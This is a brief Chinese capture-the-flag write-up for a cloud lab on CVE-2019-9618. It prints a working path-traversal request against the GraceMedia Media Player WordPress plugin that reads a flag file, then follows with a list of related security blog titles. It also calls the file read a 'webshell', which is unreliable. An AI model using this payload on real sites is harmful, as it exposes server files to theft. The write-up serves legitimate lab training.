春秋云境CVE-2019-9618

1.阅读靶场介绍

没有任何思路

但是以往的wordpress会出现这个玩法可以试试

话不多说,进入正题

2.启动靶场

如下图所示

3.poc

直接在路径拼接上

https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag

到此就可以完成webshell了

感谢您宝贵的时间

相关推荐
独隅10 小时前
Cursor 安全插件链:构建实时 SAST/DAST 辅助分析工作流
安全
吴声子夜歌11 小时前
网络安全——网络渗透测试(网络扫描)
网络·web安全·php
fish-man11 小时前
ceshi ceshi yixia
网络·安全·web安全
科技新资讯13 小时前
防护加密流量中的API接口安全有哪些安全产品措施
安全·系统安全
志栋智能13 小时前
安全超自动化:构建全方位安全可观测性的基础
网络·安全·自动化
Splashtop高性能远程控制软件14 小时前
AI 落地的连接基建评估:消费品行业远程连接方案的四个技术维度(性能 / 精度 / 安全 / 统一管理)
运维·人工智能·安全·远程工作·splashtop
智塑未来14 小时前
鸿蒙6.1隐私安全升级——加密分享限时查看+水印+应用锁+防诈一键开启
安全·华为·harmonyos
TJHHH.15 小时前
XSS-labs-master
前端·web安全·xss
殷紫川15 小时前
AI Agent 安全防护实战:最小权限与 Human-in-the-loop 的工程防线
安全·agent·ai编程
吴声子夜歌16 小时前
网络安全——无线网络的渗透测试
网络·安全·web安全